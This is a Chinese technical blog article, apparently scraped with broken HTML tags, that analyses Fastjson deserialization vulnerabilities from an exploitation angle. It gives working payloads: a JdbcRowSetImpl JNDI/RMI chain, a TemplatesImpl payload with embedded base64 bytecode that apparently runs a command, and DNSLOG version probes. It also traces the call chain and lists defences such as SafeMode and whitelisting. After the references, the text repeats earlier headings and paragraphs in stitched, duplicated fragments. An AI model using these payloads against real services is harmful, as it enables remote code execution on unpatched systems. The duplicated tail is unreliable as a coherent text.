Fastjson反序列化漏洞深入分析与利用<\/h1>

前言<\/h2>
Fastjson是阿里巴巴开发的一款高性能JSON解析库，广泛应用于Java项目中。本文将从漏洞利用角度出发，逆向分析Fastjson反序列化漏洞的原理、利用方式及防御措施。<\/p>

基础概念<\/h2>

@type的作用<\/h3>

@type<\/code>是Fastjson中一个关键特性，用于指定反序列化时的目标类：<\/p>

\/\/ 普通序列化
<\/span><\/span><\/span><\/span>String str1 =<\/span> JSONObject.<\/span>toJSONString<\/span>(<\/span>user);<\/span> 
<\/span><\/span>\/\/ 输出: {"age":18,"name":"summer"}
<\/span><\/span><\/span><\/span>
<\/span><\/span>\/\/ 带类名的序列化
<\/span><\/span><\/span><\/span>String str2 =<\/span> JSONObject.<\/span>toJSONString<\/span>(<\/span>user,<\/span> SerializerFeature.<\/span>WriteClassName<\/span>);<\/span>
<\/span><\/span>\/\/ 输出: {"@type":"vul.fastjson.User","age":18,"name":"summer"}
<\/span><\/span><\/span><\/code><\/pre>当Fastjson反序列化带有@type<\/code>的JSON时，会尝试实例化指定类的对象：<\/p>
String payload =<\/span> "{\"@type\":\"vul.fastjson.User\",\"age\":18,\"name\":\"summer\"}"<\/span>;<\/span>
<\/span><\/span>Object ob =<\/span> JSON.<\/span>parse<\/span>(<\/span>payload);<\/span>
<\/span><\/span>\/\/ 实际得到User类对象而非简单的JSONObject
<\/span><\/span><\/span><\/code><\/pre>漏洞利用分析<\/h2>
利用链构造<\/h3>
Fastjson反序列化漏洞的核心在于攻击者可以控制@type<\/code>指定的类，并通过精心构造的JSON数据触发恶意行为。<\/p>
JdbcRowSetImpl利用链<\/h4>
String payload =<\/span> "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\","<\/span> +<\/span>
<\/span><\/span>                "\"dataSourceName\":\"rmi:\/\/localhost:1090\/Exploit\",\"autoCommit\":true}"<\/span>;<\/span>
<\/span><\/span><\/code><\/pre>关键点分析<\/strong>:<\/p>

dataSourceName<\/code>: 指定JNDI查找的资源地址<\/li>
autoCommit<\/code>: 设置为true时自动触发连接<\/li>
<\/ol>
等价代码:<\/p>
JdbcRowSetImpl jdbcRowSet =<\/span> new<\/span> JdbcRowSetImpl();<\/span>
<\/span><\/span>jdbcRowSet.<\/span>setDataSourceName<\/span>(<\/span>"ldap:\/\/127.0.0.1:1389\/Exploit"<\/span>);<\/span>
<\/span><\/span>jdbcRowSet.<\/span>setAutoCommit<\/span>(<\/span>true<\/span>);<\/span> \/\/ 触发漏洞
<\/span><\/span><\/span><\/code><\/pre>TemplatesImpl利用链<\/h4>
{
<\/span><\/span>  "@type"<\/span>:"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"<\/span>,
<\/span><\/span>  "_bytecodes"<\/span>:["yv66vgAAADIANAoABwAlCgAmACcIACgKACYAKQcAKgoABQAlBwArAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAAtManNvbi9UZXN0OwEACkV4Y2VwdGlvbnMHACwBAAl0cmFuc2Zvcm0BAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQByKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO1tMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsHAC0BAARtYWluAQAWKFtMamF2YS9sYW5nL1N0cmluZzspVgEABGFyZ3MBABNbTGphdmEvbGFuZy9TdHJpbmc7AQABdAcALgEAClNvdXJjZUZpbGUBAAlUZXN0LmphdmEMAAgACQcALwwAMAAxAQAEY2FsYwwAMgAzAQAJanNvbi9UZXN0AQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAE2phdmEvaW8vSU9FeGNlcHRpb24BADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABNqYXZhL2xhbmcvRXhjZXB0aW9uAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwAhAAUABwAAAAAABAABAAgACQACAAoAAABAAAIAAQAAAA4qtwABuAACEgO2AARXsQAAAAIACwAAAA4AAwAAABEABAASAA0AEwAMAAAADAABAAAADgANAA4AAAAPAAAABAABABAAAQARABIAAQAKAAAASQAAAAQAAAABsQAAAAIACwAAAAYAAQAAABcADAAAACoABAAAAAEADQAOAAAAAAABABMAFAABAAAAAQAVABYAAgAAAAEAFwAYAAMAAQARABkAAgAKAAAAPwAAAAMAAAABsQAAAAIACwAAAAYAAQAAABwADAAAACAAAwAAAAEADQAOAAAAAAABABMAFAABAAAAAQAaABsAAgAPAAAABAABABwACQAdAB4AAgAKAAAAQQACAAIAAAAJuwAFWbcABkyxAAAAAgALAAAACgACAAAAHwAIACAADAAAABYAAgAAAAkAHwAgAAAACAABACEADgABAA8AAAAEAAEAIgABACMAAAACACQ="<\/span>],
<\/span><\/span>  "_name"<\/span>:"a.b"<\/span>,
<\/span><\/span>  "_tfactory"<\/span>:{ },
<\/span><\/span>  "_outputProperties"<\/span>:{ }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞触发流程<\/h3>

JSON#parse()<\/code>调用DefaultJSONParser#parse()<\/code><\/li>
实例化DefaultJSONParser<\/code>时创建JSONScanner<\/code>解析输入<\/li>
解析到@type<\/code>字段时获取指定类名<\/li>
进入反序列化阶段：

deserializer#deserialze()<\/code><\/li>
parseRest()<\/code><\/li>
fieldDeser#setValue<\/code><\/li>
通过反射调用setter方法<\/li>
最终触发恶意代码<\/li>
<\/ul>
<\/li>
<\/ol>
完整利用链<\/strong>:<\/p>
JSON.parse()
  → DefaultJSONParser.parse()
    → DefaultJSONParser.parseObject()
      → JavaBeanDeserializer.deserialze()
        → JavaBeanDeserializer.parseRest()
          → FieldDeserializer.setValue()
            → Reflect.invoke()
              → JdbcRowSetImpl.setAutoCommit()
<\/code><\/pre>
探测与验证技术<\/h2>
DNSLOG探测<\/h3>
不同Fastjson版本适用的DNSLOG探测方式：<\/p>
\/\/ 1.2.36 < fastjson <= 1.2.72
<\/span><\/span><\/span><\/span>String payload =<\/span> "{{\"@type\":\"java.net.URL\",\"val\":\"http:\/\/dnslog.cn\"}:\"summer\"}"<\/span>;<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 全版本支持(fastjson <= 1.2.72)
<\/span><\/span><\/span><\/span>String payload1 =<\/span> "{\"@type\":\"java.net.Inet4Address\",\"val\":\"dnslog.cn\"}"<\/span>;<\/span>
<\/span><\/span>String payload2 =<\/span> "{\"@type\":\"java.net.Inet6Address\",\"val\":\"dnslog.cn\"}"<\/span>;<\/span>
<\/span><\/span><\/code><\/pre>防御措施<\/h2>

升级到最新安全版本<\/li>
使用SafeMode<\/code>禁止@type<\/code>功能：
ParserConfig.<\/span>getGlobalInstance<\/span>().<\/span>setSafeMode<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span><\/code><\/pre><\/li>
白名单控制可反序列化的类：
ParserConfig.<\/span>getGlobalInstance<\/span>().<\/span>addAccept<\/span>(<\/span>"com.yourpackage."<\/span>);<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
参考资源<\/h2>

Fastjson反序列化漏洞分析<\/a><\/li>
JdbcRowSetImpl文档<\/a><\/li>
DNSLOG探测Fastjson的方法<\/a><\/li>
Fastjson安全公告<\/a><\/li>
<\/ol>

Fastjson反序列化漏洞深入分析与利用<\/h1>

前言<\/h2> Fastjson是阿里巴巴开发的一款高性能JSON解析库，广泛应用于Java项目中。本文将从漏洞利用角度出发，逆向分析Fastjson反序列化漏洞的原理、利用方式及防御措施。<\/p>

基础概念<\/h2>

漏洞利用分析<\/h2>

利用链构造<\/h3> Fastjson反序列化漏洞的核心在于攻击者可以控制@type<\/code>指定的类，并通过精心构造的JSON数据触发恶意行为。<\/p>

探测与验证技术<\/h2>

参考资源<\/h2> Fastjson反序列化漏洞分析<\/a><\/li> JdbcRowSetImpl文档<\/a><\/li> DNSLOG探测Fastjson的方法<\/a><\/li> Fastjson安全公告<\/a><\/li> <\/ol>

前言<\/h2>
Fastjson是阿里巴巴开发的一款高性能JSON解析库，广泛应用于Java项目中。本文将从漏洞利用角度出发，逆向分析Fastjson反序列化漏洞的原理、利用方式及防御措施。<\/p>

利用链构造<\/h3>
Fastjson反序列化漏洞的核心在于攻击者可以控制`@type<\/code>指定的类，并通过精心构造的JSON数据触发恶意行为。<\/p>`

参考资源<\/h2>

Fastjson反序列化漏洞分析<\/a><\/li>
JdbcRowSetImpl文档<\/a><\/li>
DNSLOG探测Fastjson的方法<\/a><\/li>
Fastjson安全公告<\/a><\/li> <\/ol>